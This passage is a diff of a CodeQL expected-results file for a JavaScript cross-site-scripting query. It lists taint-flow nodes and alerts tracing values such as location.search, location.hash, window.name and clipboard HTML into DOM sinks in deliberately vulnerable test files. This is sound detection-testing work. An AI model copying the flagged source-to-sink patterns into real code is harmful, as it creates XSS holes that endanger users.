ring(1) | semmle.label | getUrl( ... ring(1) | +| tst.js:332:7:332:39 | target | semmle.label | target | +| tst.js:332:16:332:39 | documen ... .search | semmle.label | documen ... .search | +| tst.js:333:12:333:17 | target | semmle.label | target | +| tst.js:339:10:339:42 | target | semmle.label | target | +| tst.js:339:19:339:42 | documen ... .search | semmle.label | documen ... .search | +| tst.js:340:16:340:21 | target | semmle.label | target | +| tst.js:341:20:341:25 | target | semmle.label | target | +| tst.js:344:21:344:26 | target | semmle.label | target | +| tst.js:347:18:347:23 | target | semmle.label | target | +| tst.js:355:7:355:39 | target | semmle.label | target | +| tst.js:355:16:355:39 | documen ... .search | semmle.label | documen ... .search | +| tst.js:357:18:357:23 | target | semmle.label | target | +| tst.js:364:7:364:39 | target | semmle.label | target | +| tst.js:364:16:364:39 | documen ... .search | semmle.label | documen ... .search | +| tst.js:367:18:367:23 | target | semmle.label | target | +| tst.js:369:18:369:23 | target | semmle.label | target | +| tst.js:369:18:369:29 | target.taint | semmle.label | target.taint | +| tst.js:374:3:374:8 | [post update] target [taint3] | semmle.label | [post update] target [taint3] | +| tst.js:374:19:374:42 | documen ... .search | semmle.label | documen ... .search | +| tst.js:375:18:375:23 | target [taint3] | semmle.label | target [taint3] | +| tst.js:375:18:375:30 | target.taint3 | semmle.label | target.taint3 | +| tst.js:380:18:380:23 | target | semmle.label | target | +| tst.js:380:18:380:30 | target.taint5 | semmle.label | target.taint5 | +| tst.js:389:18:389:23 | target | semmle.label | target | +| tst.js:389:18:389:30 | target.taint7 | semmle.label | target.taint7 | +| tst.js:391:3:391:8 | [post update] target [taint8] | semmle.label | [post update] target [taint8] | +| tst.js:391:19:391:24 | target | semmle.label | target | +| tst.js:391:19:391:24 | target [taint8] | semmle.label | target [taint8] | +| tst.js:391:19:391:31 | target.taint8 | semmle.label | target.taint8 | +| tst.js:392:18:392:23 | target [taint8] | semmle.label | target [taint8] | +| tst.js:392:18:392:30 | target.taint8 | semmle.label | target.taint8 | +| tst.js:399:7:399:46 | payload | semmle.label | payload | +| tst.js:399:17:399:36 | window.location.hash | semmle.label | window.location.hash | +| tst.js:399:17:399:46 | window. ... bstr(1) | semmle.label | window. ... bstr(1) | +| tst.js:400:18:400:24 | payload | semmle.label | payload | +| tst.js:402:7:402:55 | match | semmle.label | match | +| tst.js:402:15:402:34 | window.location.hash | semmle.label | window.location.hash | +| tst.js:402:15:402:55 | window. ... (\\w+)/) | semmle.label | window. ... (\\w+)/) | +| tst.js:404:20:404:24 | match | semmle.label | match | +| tst.js:404:20:404:27 | match[1] | semmle.label | match[1] | +| tst.js:407:18:407:37 | window.location.hash | semmle.label | window.location.hash | +| tst.js:407:18:407:48 | window. ... it('#') [1] | semmle.label | window. ... it('#') [1] | +| tst.js:407:18:407:51 | window. ... '#')[1] | semmle.label | window. ... '#')[1] | +| tst.js:411:7:411:39 | target | semmle.label | target | +| tst.js:411:16:411:39 | documen ... .search | semmle.label | documen ... .search | +| tst.js:413:18:413:23 | target | semmle.label | target | +| tst.js:413:18:413:89 | target. ... data>') | semmle.label | target. ... data>') | +| tst.js:419:6:419:38 | source | semmle.label | source | +| tst.js:419:15:419:38 | documen ... .search | semmle.label | documen ... .search | +| tst.js:423:28:423:33 | source | semmle.label | source | +| tst.js:424:33:424:38 | source | semmle.label | source | +| tst.js:425:34:425:39 | source | semmle.label | source | +| tst.js:426:41:426:46 | source | semmle.label | source | +| tst.js:427:44:427:49 | source | semmle.label | source | +| tst.js:428:32:428:37 | source | semmle.label | source | +| tst.js:436:7:436:39 | source | semmle.label | source | +| tst.js:436:16:436:39 | documen ... .search | semmle.label | documen ... .search | +| tst.js:438:18:438:23 | source | semmle.label | source | +| tst.js:439:18:439:42 | ansiToH ... source) | semmle.label | ansiToH ... source) | +| tst.js:439:36:439:41 | source | semmle.label | source | +| tst.js:443:6:443:38 | source | semmle.label | source | +| tst.js:443:15:443:38 | documen ... .search | semmle.label | documen ... .search | +| tst.js:446:21:446:26 | source | semmle.label | source | +| tst.js:448:19:448:24 | source | semmle.label | source | +| tst.js:450:20:450:25 | source | semmle.label | source | +| tst.js:454:7:454:46 | url | semmle.label | url | +| tst.js:454:13:454:36 | documen ... .search | semmle.label | documen ... .search | +| tst.js:454:13:454:46 | documen ... bstr(1) | semmle.label | documen ... bstr(1) | +| tst.js:456:19:456:21 | url | semmle.label | url | +| tst.js:457:26:457:28 | url | semmle.label | url | +| tst.js:458:25:458:27 | url | semmle.label | url | +| tst.js:459:20:459:22 | url | semmle.label | url | +| tst.js:469:22:469:24 | url | semmle.label | url | +| tst.js:474:23:474:35 | location.hash | semmle.label | location.hash | +| tst.js:474:23:474:45 | locatio ... bstr(1) | semmle.label | locatio ... bstr(1) | +| tst.js:477:18:477:30 | location.hash | semmle.label | location.hash | +| tst.js:477:18:477:40 | locatio ... bstr(1) | semmle.label | locatio ... bstr(1) | +| tst.js:484:33:484:63 | decodeU ... n.hash) | semmle.label | decodeU ... n.hash) | +| tst.js:484:43:484:62 | window.location.hash | semmle.label | window.location.hash | +| tst.js:491:7:491:39 | target | semmle.label | target | +| tst.js:491:16:491:39 | documen ... .search | semmle.label | documen ... .search | +| tst.js:492:18:492:23 | target | semmle.label | target | +| tst.js:492:18:492:54 | target. ... "), '') | semmle.label | target. ... "), '') | +| tst.js:498:7:498:26 | source | semmle.label | source | +| tst.js:498:16:498:26 | window.name | semmle.label | window.name | +| tst.js:499:18:499:33 | unescape(source) | semmle.label | unescape(source) | +| tst.js:499:27:499:32 | source | semmle.label | source | +| typeahead.js:20:13:20:45 | target | semmle.label | target | +| typeahead.js:20:22:20:45 | documen ... .search | semmle.label | documen ... .search | +| typeahead.js:21:12:21:17 | target | semmle.label | target | +| typeahead.js:24:30:24:32 | val | semmle.label | val | +| typeahead.js:25:18:25:20 | val | semmle.label | val | +| v-html.vue:2:8:2:23 | v-html=tainted | semmle.label | v-html=tainted | +| v-html.vue:6:42:6:58 | document.location | semmle.label | document.location | +| various-concat-obfuscations.js:2:6:2:39 | tainted | semmle.label | tainted | +| various-concat-obfuscations.js:2:16:2:39 | documen ... .search | semmle.label | documen ... .search | +| various-concat-obfuscations.js:4:4:4:31 | "
    " ...
    " | semmle.label | "
    " ...
    " | +| various-concat-obfuscations.js:4:14:4:20 | tainted | semmle.label | tainted | +| various-concat-obfuscations.js:5:4:5:26 | `
    $ ...
    ` | semmle.label | `
    $ ...
    ` | +| various-concat-obfuscations.js:5:12:5:18 | tainted | semmle.label | tainted | +| various-concat-obfuscations.js:6:4:6:26 | "
    " ... ainted) | semmle.label | "
    " ... ainted) | +| various-concat-obfuscations.js:6:4:6:43 | "
    " ... /div>") | semmle.label | "
    " ... /div>") | +| various-concat-obfuscations.js:6:19:6:25 | tainted | semmle.label | tainted | +| various-concat-obfuscations.js:7:4:7:31 | ["
    ... /div>"] | semmle.label | ["
    ... /div>"] | +| various-concat-obfuscations.js:7:4:7:38 | ["
    ... .join() | semmle.label | ["
    ... .join() | +| various-concat-obfuscations.js:7:14:7:20 | tainted | semmle.label | tainted | +| various-concat-obfuscations.js:9:4:9:34 | "
    " | semmle.label | "
    " | +| various-concat-obfuscations.js:9:19:9:25 | tainted | semmle.label | tainted | +| various-concat-obfuscations.js:10:4:10:27 | `
    ` | semmle.label | `
    ` | +| various-concat-obfuscations.js:10:16:10:22 | tainted | semmle.label | tainted | +| various-concat-obfuscations.js:11:4:11:31 | "
    ") | semmle.label | "
    ") | +| various-concat-obfuscations.js:11:24:11:30 | tainted | semmle.label | tainted | +| various-concat-obfuscations.js:12:4:12:34 | ["
    "] | semmle.label | ["
    "] | +| various-concat-obfuscations.js:12:4:12:41 | ["
    ' | semmle.label | '
    ' | +| various-concat-obfuscations.js:15:27:15:55 | (attrs. ... 'left') | semmle.label | (attrs. ... 'left') | +| various-concat-obfuscations.js:15:28:15:32 | attrs | semmle.label | attrs | +| various-concat-obfuscations.js:17:24:17:28 | attrs | semmle.label | attrs | +| various-concat-obfuscations.js:18:10:18:59 | '
    ') | semmle.label | '
    ') | +| various-concat-obfuscations.js:18:10:18:105 | '
    ') [ArrayElement] | semmle.label | '
    ') [ArrayElement] | +| various-concat-obfuscations.js:18:32:18:36 | attrs | semmle.label | attrs | +| various-concat-obfuscations.js:18:32:18:58 | attrs.d ... 'left' | semmle.label | attrs.d ... 'left' | +| various-concat-obfuscations.js:20:4:20:47 | indirec ... .attrs) | semmle.label | indirec ... .attrs) | +| various-concat-obfuscations.js:20:17:20:40 | documen ... .search | semmle.label | documen ... .search | +| various-concat-obfuscations.js:20:17:20:46 | documen ... h.attrs | semmle.label | documen ... h.attrs | +| various-concat-obfuscations.js:21:4:21:47 | indirec ... .attrs) | semmle.label | indirec ... .attrs) | +| various-concat-obfuscations.js:21:17:21:40 | documen ... .search | semmle.label | documen ... .search | +| various-concat-obfuscations.js:21:17:21:46 | documen ... h.attrs | semmle.label | documen ... h.attrs | +| winjs.js:2:7:2:53 | tainted | semmle.label | tainted | +| winjs.js:2:17:2:40 | documen ... .search | semmle.label | documen ... .search | +| winjs.js:2:17:2:53 | documen ... ring(1) | semmle.label | documen ... ring(1) | +| winjs.js:3:43:3:49 | tainted | semmle.label | tainted | +| winjs.js:4:43:4:49 | tainted | semmle.label | tainted | subpaths | optionalSanitizer.js:34:28:34:35 | tainted2 | optionalSanitizer.js:28:24:28:24 | x | optionalSanitizer.js:29:12:29:12 | x | optionalSanitizer.js:34:16:34:36 | sanitiz ... inted2) | | optionalSanitizer.js:41:28:41:35 | tainted3 | optionalSanitizer.js:28:24:28:24 | x | optionalSanitizer.js:29:12:29:12 | x | optionalSanitizer.js:41:16:41:36 | sanitiz ... inted3) | | optionalSanitizer.js:45:41:45:46 | target | optionalSanitizer.js:28:24:28:24 | x | optionalSanitizer.js:29:12:29:12 | x | optionalSanitizer.js:45:29:45:47 | sanitizeBad(target) | | tooltip.jsx:18:51:18:57 | provide [source] | tooltip.jsx:23:38:23:43 | source | tooltip.jsx:23:38:23:43 | source | tooltip.jsx:18:51:18:59 | provide() | -| tst.js:40:20:40:43 | documen ... .search | tst.js:36:14:36:14 | x | tst.js:37:10:37:10 | x | tst.js:40:16:40:44 | baz(doc ... search) | -| tst.js:46:21:46:44 | documen ... .search | tst.js:42:15:42:15 | s | tst.js:43:10:43:31 | "
    " ...
    " | tst.js:46:16:46:45 | wrap(do ... search) | -| tst.js:54:21:54:44 | documen ... .search | tst.js:48:15:48:15 | s | tst.js:50:12:50:22 | s.substr(1) | tst.js:54:16:54:45 | chop(do ... search) | -| tst.js:54:21:54:44 | documen ... .search | tst.js:48:15:48:15 | s | tst.js:50:12:50:22 | s.substr(1) | tst.js:54:16:54:45 | chop(do ... search) | -| tst.js:54:21:54:44 | documen ... .search | tst.js:48:15:48:15 | s | tst.js:50:12:50:22 | s.substr(1) | tst.js:54:16:54:45 | chop(do ... search) | -| tst.js:56:21:56:44 | documen ... .search | tst.js:48:15:48:15 | s | tst.js:50:12:50:22 | s.substr(1) | tst.js:56:16:56:45 | chop(do ... search) | -| tst.js:56:21:56:44 | documen ... .search | tst.js:48:15:48:15 | s | tst.js:50:12:50:22 | s.substr(1) | tst.js:56:16:56:45 | chop(do ... search) | -| tst.js:56:21:56:44 | documen ... .search | tst.js:48:15:48:15 | s | tst.js:50:12:50:22 | s.substr(1) | tst.js:56:16:56:45 | chop(do ... search) | -| tst.js:58:21:58:31 | chop(bar()) | tst.js:42:15:42:15 | s | tst.js:43:10:43:31 | "
    " ...
    " | tst.js:58:16:58:32 | wrap(chop(bar())) | -| tst.js:58:21:58:31 | chop(bar()) | tst.js:42:15:42:15 | s | tst.js:43:10:43:31 | "
    " ...
    " | tst.js:58:16:58:32 | wrap(chop(bar())) | -| tst.js:58:26:58:30 | bar() | tst.js:48:15:48:15 | s | tst.js:50:12:50:22 | s.substr(1) | tst.js:58:21:58:31 | chop(bar()) | -| tst.js:58:26:58:30 | bar() | tst.js:48:15:48:15 | s | tst.js:50:12:50:22 | s.substr(1) | tst.js:58:21:58:31 | chop(bar()) | +| tst.js:34:20:34:43 | documen ... .search | tst.js:31:14:31:14 | x | tst.js:32:10:32:10 | x | tst.js:34:16:34:44 | baz(doc ... search) | +| tst.js:39:21:39:44 | documen ... .search | tst.js:36:15:36:15 | s | tst.js:37:10:37:31 | "
    " ...
    " | tst.js:39:16:39:45 | wrap(do ... search) | +| tst.js:46:21:46:44 | documen ... .search | tst.js:41:15:41:15 | s | tst.js:43:12:43:22 | s.substr(1) | tst.js:46:16:46:45 | chop(do ... search) | +| tst.js:46:21:46:44 | documen ... .search | tst.js:41:15:41:15 | s | tst.js:43:12:43:22 | s.substr(1) | tst.js:46:16:46:45 | chop(do ... search) | +| tst.js:46:21:46:44 | documen ... .search | tst.js:41:15:41:15 | s | tst.js:43:12:43:22 | s.substr(1) | tst.js:46:16:46:45 | chop(do ... search) | +| tst.js:47:21:47:44 | documen ... .search | tst.js:41:15:41:15 | s | tst.js:43:12:43:22 | s.substr(1) | tst.js:47:16:47:45 | chop(do ... search) | +| tst.js:47:21:47:44 | documen ... .search | tst.js:41:15:41:15 | s | tst.js:43:12:43:22 | s.substr(1) | tst.js:47:16:47:45 | chop(do ... search) | +| tst.js:47:21:47:44 | documen ... .search | tst.js:41:15:41:15 | s | tst.js:43:12:43:22 | s.substr(1) | tst.js:47:16:47:45 | chop(do ... search) | +| tst.js:48:21:48:31 | chop(bar()) | tst.js:36:15:36:15 | s | tst.js:37:10:37:31 | "
    " ...
    " | tst.js:48:16:48:32 | wrap(chop(bar())) | +| tst.js:48:21:48:31 | chop(bar()) | tst.js:36:15:36:15 | s | tst.js:37:10:37:31 | "
    " ...
    " | tst.js:48:16:48:32 | wrap(chop(bar())) | +| tst.js:48:26:48:30 | bar() | tst.js:41:15:41:15 | s | tst.js:43:12:43:22 | s.substr(1) | tst.js:48:21:48:31 | chop(bar()) | +| tst.js:48:26:48:30 | bar() | tst.js:41:15:41:15 | s | tst.js:43:12:43:22 | s.substr(1) | tst.js:48:21:48:31 | chop(bar()) | | various-concat-obfuscations.js:20:17:20:46 | documen ... h.attrs | various-concat-obfuscations.js:14:24:14:28 | attrs | various-concat-obfuscations.js:15:10:15:83 | '
    ' | various-concat-obfuscations.js:20:4:20:47 | indirec ... .attrs) | | various-concat-obfuscations.js:21:17:21:46 | documen ... h.attrs | various-concat-obfuscations.js:17:24:17:28 | attrs | various-concat-obfuscations.js:18:10:18:105 | '
    ') | various-concat-obfuscations.js:21:4:21:47 | indirec ... .attrs) | | various-concat-obfuscations.js:21:17:21:46 | documen ... h.attrs | various-concat-obfuscations.js:17:24:17:28 | attrs | various-concat-obfuscations.js:18:10:18:105 | '
    ') [ArrayElement] | various-concat-obfuscations.js:21:4:21:47 | indirec ... .attrs) | -#select -| addEventListener.js:2:20:2:29 | event.data | addEventListener.js:1:43:1:47 | event | addEventListener.js:2:20:2:29 | event.data | Cross-site scripting vulnerability due to $@. | addEventListener.js:1:43:1:47 | event | user-provided value | -| addEventListener.js:6:20:6:23 | data | addEventListener.js:5:43:5:48 | {data} | addEventListener.js:6:20:6:23 | data | Cross-site scripting vulnerability due to $@. | addEventListener.js:5:43:5:48 | {data} | user-provided value | -| addEventListener.js:12:24:12:33 | event.data | addEventListener.js:10:21:10:25 | event | addEventListener.js:12:24:12:33 | event.data | Cross-site scripting vulnerability due to $@. | addEventListener.js:10:21:10:25 | event | user-provided value | -| angular2-client.ts:24:44:24:71 | \\u0275getDOM ... ().href | angular2-client.ts:24:44:24:71 | \\u0275getDOM ... ().href | angular2-client.ts:24:44:24:71 | \\u0275getDOM ... ().href | Cross-site scripting vulnerability due to $@. | angular2-client.ts:24:44:24:71 | \\u0275getDOM ... ().href | user-provided value | -| angular2-client.ts:26:44:26:73 | this.ro ... ams.foo | angular2-client.ts:26:44:26:69 | this.ro ... .params | angular2-client.ts:26:44:26:73 | this.ro ... ams.foo | Cross-site scripting vulnerability due to $@. | angular2-client.ts:26:44:26:69 | this.ro ... .params | user-provided value | -| angular2-client.ts:27:44:27:78 | this.ro ... ams.foo | angular2-client.ts:27:44:27:74 | this.ro ... yParams | angular2-client.ts:27:44:27:78 | this.ro ... ams.foo | Cross-site scripting vulnerability due to $@. | angular2-client.ts:27:44:27:74 | this.ro ... yParams | user-provided value | -| angular2-client.ts:28:44:28:71 | this.ro ... ragment | angular2-client.ts:28:44:28:71 | this.ro ... ragment | angular2-client.ts:28:44:28:71 | this.ro ... ragment | Cross-site scripting vulnerability due to $@. | angular2-client.ts:28:44:28:71 | this.ro ... ragment | user-provided value | -| angular2-client.ts:29:44:29:82 | this.ro ... ('foo') | angular2-client.ts:29:44:29:82 | this.ro ... ('foo') | angular2-client.ts:29:44:29:82 | this.ro ... ('foo') | Cross-site scripting vulnerability due to $@. | angular2-client.ts:29:44:29:82 | this.ro ... ('foo') | user-provided value | -| angular2-client.ts:30:44:30:87 | this.ro ... ('foo') | angular2-client.ts:30:44:30:87 | this.ro ... ('foo') | angular2-client.ts:30:44:30:87 | this.ro ... ('foo') | Cross-site scripting vulnerability due to $@. | angular2-client.ts:30:44:30:87 | this.ro ... ('foo') | user-provided value | -| angular2-client.ts:32:46:32:59 | map.get('foo') | angular2-client.ts:32:46:32:59 | map.get('foo') | angular2-client.ts:32:46:32:59 | map.get('foo') | Cross-site scripting vulnerability due to $@. | angular2-client.ts:32:46:32:59 | map.get('foo') | user-provided value | -| angular2-client.ts:35:44:35:74 | this.ro ... 1].path | angular2-client.ts:35:44:35:74 | this.ro ... 1].path | angular2-client.ts:35:44:35:74 | this.ro ... 1].path | Cross-site scripting vulnerability due to $@. | angular2-client.ts:35:44:35:74 | this.ro ... 1].path | user-provided value | -| angular2-client.ts:36:44:36:82 | this.ro ... eters.x | angular2-client.ts:36:44:36:80 | this.ro ... ameters | angular2-client.ts:36:44:36:82 | this.ro ... eters.x | Cross-site scripting vulnerability due to $@. | angular2-client.ts:36:44:36:80 | this.ro ... ameters | user-provided value | -| angular2-client.ts:37:44:37:91 | this.ro ... et('x') | angular2-client.ts:37:44:37:91 | this.ro ... et('x') | angular2-client.ts:37:44:37:91 | this.ro ... et('x') | Cross-site scripting vulnerability due to $@. | angular2-client.ts:37:44:37:91 | this.ro ... et('x') | user-provided value | -| angular2-client.ts:38:44:38:91 | this.ro ... arams.x | angular2-client.ts:38:44:38:89 | this.ro ... .params | angular2-client.ts:38:44:38:91 | this.ro ... arams.x | Cross-site scripting vulnerability due to $@. | angular2-client.ts:38:44:38:89 | this.ro ... .params | user-provided value | -| angular2-client.ts:40:44:40:58 | this.router.url | angular2-client.ts:40:44:40:58 | this.router.url | angular2-client.ts:40:44:40:58 | this.router.url | Cross-site scripting vulnerability due to $@. | angular2-client.ts:40:44:40:58 | this.router.url | user-provided value | -| angular2-client.ts:42:45:42:59 | this.router.url | angular2-client.ts:42:45:42:59 | this.router.url | angular2-client.ts:42:45:42:59 | this.router.url | Cross-site scripting vulnerability due to $@. | angular2-client.ts:42:45:42:59 | this.router.url | user-provided value | -| angular2-client.ts:43:75:43:109 | this.ro ... ams.foo | angular2-client.ts:43:75:43:105 | this.ro ... yParams | angular2-client.ts:43:75:43:109 | this.ro ... ams.foo | Cross-site scripting vulnerability due to $@. | angular2-client.ts:43:75:43:105 | this.ro ... yParams | user-provided value | -| angular2-client.ts:47:44:47:76 | routeSn ... ('foo') | angular2-client.ts:47:44:47:76 | routeSn ... ('foo') | angular2-client.ts:47:44:47:76 | routeSn ... ('foo') | Cross-site scripting vulnerability due to $@. | angular2-client.ts:47:44:47:76 | routeSn ... ('foo') | user-provided value | -| angular-tempate-url.js:9:26:9:45 | Cookie.get("unsafe") | angular-tempate-url.js:13:30:13:31 | ev | angular-tempate-url.js:9:26:9:45 | Cookie.get("unsafe") | Cross-site scripting vulnerability due to $@. | angular-tempate-url.js:13:30:13:31 | ev | user-provided value | -| classnames.js:7:31:7:84 | `` | classnames.js:7:58:7:68 | window.name | classnames.js:7:31:7:84 | `` | Cross-site scripting vulnerability due to $@. | classnames.js:7:58:7:68 | window.name | user-provided value | -| classnames.js:8:31:8:85 | `` | classnames.js:8:59:8:69 | window.name | classnames.js:8:31:8:85 | `` | Cross-site scripting vulnerability due to $@. | classnames.js:8:59:8:69 | window.name | user-provided value | -| classnames.js:9:31:9:85 | `` | classnames.js:9:59:9:69 | window.name | classnames.js:9:31:9:85 | `` | Cross-site scripting vulnerability due to $@. | classnames.js:9:59:9:69 | window.name | user-provided value | -| classnames.js:11:31:11:79 | `` | classnames.js:10:45:10:55 | window.name | classnames.js:11:31:11:79 | `` | Cross-site scripting vulnerability due to $@. | classnames.js:10:45:10:55 | window.name | user-provided value | -| classnames.js:13:31:13:83 | `` | classnames.js:13:57:13:67 | window.name | classnames.js:13:31:13:83 | `` | Cross-site scripting vulnerability due to $@. | classnames.js:13:57:13:67 | window.name | user-provided value | -| classnames.js:15:31:15:78 | `` | classnames.js:15:52:15:62 | window.name | classnames.js:15:31:15:78 | `` | Cross-site scripting vulnerability due to $@. | classnames.js:15:52:15:62 | window.name | user-provided value | -| classnames.js:17:32:17:79 | `` | classnames.js:17:53:17:63 | window.name | classnames.js:17:32:17:79 | `` | Cross-site scripting vulnerability due to $@. | classnames.js:17:53:17:63 | window.name | user-provided value | -| clipboard.ts:15:25:15:28 | html | clipboard.ts:8:18:8:51 | clipboa ... /html') | clipboard.ts:15:25:15:28 | html | Cross-site scripting vulnerability due to $@. | clipboard.ts:8:18:8:51 | clipboa ... /html') | user-provided value | -| clipboard.ts:24:23:24:58 | e.clipb ... /html') | clipboard.ts:24:23:24:58 | e.clipb ... /html') | clipboard.ts:24:23:24:58 | e.clipb ... /html') | Cross-site scripting vulnerability due to $@. | clipboard.ts:24:23:24:58 | e.clipb ... /html') | user-provided value | -| clipboard.ts:29:19:29:54 | e.clipb ... /html') | clipboard.ts:29:19:29:54 | e.clipb ... /html') | clipboard.ts:29:19:29:54 | e.clipb ... /html') | Cross-site scripting vulnerability due to $@. | clipboard.ts:29:19:29:54 | e.clipb ... /html') | user-provided value | -| clipboard.ts:33:19:33:68 | e.origi ... /html') | clipboard.ts:33:19:33:68 | e.origi ... /html') | clipboard.ts:33:19:33:68 | e.origi ... /html') | Cross-site scripting vulnerability due to $@. | clipboard.ts:33:19:33:68 | e.origi ... /html') | user-provided value | -| clipboard.ts:50:29:50:32 | html | clipboard.ts:43:22:43:55 | clipboa ... /html') | clipboard.ts:50:29:50:32 | html | Cross-site scripting vulnerability due to $@. | clipboard.ts:43:22:43:55 | clipboa ... /html') | user-provided value | -| clipboard.ts:73:29:73:39 | droppedHtml | clipboard.ts:71:27:71:62 | e.clipb ... /html') | clipboard.ts:73:29:73:39 | droppedHtml | Cross-site scripting vulnerability due to $@. | clipboard.ts:71:27:71:62 | e.clipb ... /html') | user-provided value | -| clipboard.ts:99:23:99:26 | html | clipboard.ts:98:22:98:54 | dataTra ... /html') | clipboard.ts:99:23:99:26 | html | Cross-site scripting vulnerability due to $@. | clipboard.ts:98:22:98:54 | dataTra ... /html') | user-provided value | -| custom-element.js:5:26:5:36 | window.name | custom-element.js:5:26:5:36 | window.name | custom-element.js:5:26:5:36 | window.name | Cross-site scripting vulnerability due to $@. | custom-element.js:5:26:5:36 | window.name | user-provided value | -| d3.js:11:15:11:24 | getTaint() | d3.js:4:12:4:22 | window.name | d3.js:11:15:11:24 | getTaint() | Cross-site scripting vulnerability due to $@. | d3.js:4:12:4:22 | window.name | user-provided value | -| d3.js:12:20:12:29 | getTaint() | d3.js:4:12:4:22 | window.name | d3.js:12:20:12:29 | getTaint() | Cross-site scripting vulnerability due to $@. | d3.js:4:12:4:22 | window.name | user-provided value | -| d3.js:14:20:14:29 | getTaint() | d3.js:4:12:4:22 | window.name | d3.js:14:20:14:29 | getTaint() | Cross-site scripting vulnerability due to $@. | d3.js:4:12:4:22 | window.name | user-provided value | -| d3.js:21:15:21:24 | getTaint() | d3.js:4:12:4:22 | window.name | d3.js:21:15:21:24 | getTaint() | Cross-site scripting vulnerability due to $@. | d3.js:4:12:4:22 | window.name | user-provided value | -| dates.js:11:31:11:70 | `Time i ... aint)}` | dates.js:9:36:9:55 | window.location.hash | dates.js:11:31:11:70 | `Time i ... aint)}` | Cross-site scripting vulnerability due to $@. | dates.js:9:36:9:55 | window.location.hash | user-provided value | -| dates.js:12:31:12:73 | `Time i ... aint)}` | dates.js:9:36:9:55 | window.location.hash | dates.js:12:31:12:73 | `Time i ... aint)}` | Cross-site scripting vulnerability due to $@. | dates.js:9:36:9:55 | window.location.hash | user-provided value | -| dates.js:13:31:13:72 | `Time i ... time)}` | dates.js:9:36:9:55 | window.location.hash | dates.js:13:31:13:72 | `Time i ... time)}` | Cross-site scripting vulnerability due to $@. | dates.js:9:36:9:55 | window.location.hash | user-provided value | -| dates.js:16:31:16:69 | `Time i ... aint)}` | dates.js:9:36:9:55 | window.location.hash | dates.js:16:31:16:69 | `Time i ... aint)}` | Cross-site scripting vulnerability due to $@. | dates.js:9:36:9:55 | window.location.hash | user-provided value | -| dates.js:18:31:18:66 | `Time i ... aint)}` | dates.js:9:36:9:55 | window.location.hash | dates.js:18:31:18:66 | `Time i ... aint)}` | Cross-site scripting vulnerability due to $@. | dates.js:9:36:9:55 | window.location.hash | user-provided value | -| dates.js:21:31:21:68 | `Time i ... aint)}` | dates.js:9:36:9:55 | window.location.hash | dates.js:21:31:21:68 | `Time i ... aint)}` | Cross-site scripting vulnerability due to $@. | dates.js:9:36:9:55 | window.location.hash | user-provided value | -| dates.js:37:31:37:84 | `Time i ... aint)}` | dates.js:30:36:30:55 | window.location.hash | dates.js:37:31:37:84 | `Time i ... aint)}` | Cross-site scripting vulnerability due to $@. | dates.js:30:36:30:55 | window.location.hash | user-provided value | -| dates.js:38:31:38:84 | `Time i ... aint)}` | dates.js:30:36:30:55 | window.location.hash | dates.js:38:31:38:84 | `Time i ... aint)}` | Cross-site scripting vulnerability due to $@. | dates.js:30:36:30:55 | window.location.hash | user-provided value | -| dates.js:39:31:39:86 | `Time i ... aint)}` | dates.js:30:36:30:55 | window.location.hash | dates.js:39:31:39:86 | `Time i ... aint)}` | Cross-site scripting vulnerability due to $@. | dates.js:30:36:30:55 | window.location.hash | user-provided value | -| dates.js:40:31:40:84 | `Time i ... aint)}` | dates.js:30:36:30:55 | window.location.hash | dates.js:40:31:40:84 | `Time i ... aint)}` | Cross-site scripting vulnerability due to $@. | dates.js:30:36:30:55 | window.location.hash | user-provided value | -| dates.js:48:31:48:90 | `Time i ... aint)}` | dates.js:46:36:46:55 | window.location.hash | dates.js:48:31:48:90 | `Time i ... aint)}` | Cross-site scripting vulnerability due to $@. | dates.js:46:36:46:55 | window.location.hash | user-provided value | -| dates.js:49:31:49:89 | `Time i ... aint)}` | dates.js:46:36:46:55 | window.location.hash | dates.js:49:31:49:89 | `Time i ... aint)}` | Cross-site scripting vulnerability due to $@. | dates.js:46:36:46:55 | window.location.hash | user-provided value | -| dates.js:50:31:50:104 | `Time i ... aint)}` | dates.js:46:36:46:55 | window.location.hash | dates.js:50:31:50:104 | `Time i ... aint)}` | Cross-site scripting vulnerability due to $@. | dates.js:46:36:46:55 | window.location.hash | user-provided value | -| dates.js:57:31:57:101 | `Time i ... aint)}` | dates.js:54:36:54:55 | window.location.hash | dates.js:57:31:57:101 | `Time i ... aint)}` | Cross-site scripting vulnerability due to $@. | dates.js:54:36:54:55 | window.location.hash | user-provided value | -| dates.js:59:31:59:87 | `Time i ... aint)}` | dates.js:54:36:54:55 | window.location.hash | dates.js:59:31:59:87 | `Time i ... aint)}` | Cross-site scripting vulnerability due to $@. | dates.js:54:36:54:55 | window.location.hash | user-provided value | -| dates.js:61:31:61:88 | `Time i ... aint)}` | dates.js:54:36:54:55 | window.location.hash | dates.js:61:31:61:88 | `Time i ... aint)}` | Cross-site scripting vulnerability due to $@. | dates.js:54:36:54:55 | window.location.hash | user-provided value | -| dragAndDrop.ts:15:25:15:28 | html | dragAndDrop.ts:8:18:8:50 | dataTra ... /html') | dragAndDrop.ts:15:25:15:28 | html | Cross-site scripting vulnerability due to $@. | dragAndDrop.ts:8:18:8:50 | dataTra ... /html') | user-provided value | -| dragAndDrop.ts:24:23:24:57 | e.dataT ... /html') | dragAndDrop.ts:24:23:24:57 | e.dataT ... /html') | dragAndDrop.ts:24:23:24:57 | e.dataT ... /html') | Cross-site scripting vulnerability due to $@. | dragAndDrop.ts:24:23:24:57 | e.dataT ... /html') | user-provided value | -| dragAndDrop.ts:29:19:29:53 | e.dataT ... /html') | dragAndDrop.ts:29:19:29:53 | e.dataT ... /html') | dragAndDrop.ts:29:19:29:53 | e.dataT ... /html') | Cross-site scripting vulnerability due to $@. | dragAndDrop.ts:29:19:29:53 | e.dataT ... /html') | user-provided value | -| dragAndDrop.ts:33:19:33:67 | e.origi ... /html') | dragAndDrop.ts:33:19:33:67 | e.origi ... /html') | dragAndDrop.ts:33:19:33:67 | e.origi ... /html') | Cross-site scripting vulnerability due to $@. | dragAndDrop.ts:33:19:33:67 | e.origi ... /html') | user-provided value | -| dragAndDrop.ts:50:29:50:32 | html | dragAndDrop.ts:43:22:43:54 | dataTra ... /html') | dragAndDrop.ts:50:29:50:32 | html | Cross-site scripting vulnerability due to $@. | dragAndDrop.ts:43:22:43:54 | dataTra ... /html') | user-provided value | -| dragAndDrop.ts:73:29:73:39 | droppedHtml | dragAndDrop.ts:71:27:71:61 | e.dataT ... /html') | dragAndDrop.ts:73:29:73:39 | droppedHtml | Cross-site scripting vulnerability due to $@. | dragAndDrop.ts:71:27:71:61 | e.dataT ... /html') | user-provided value | -| event-handler-receiver.js:2:31:2:83 | '

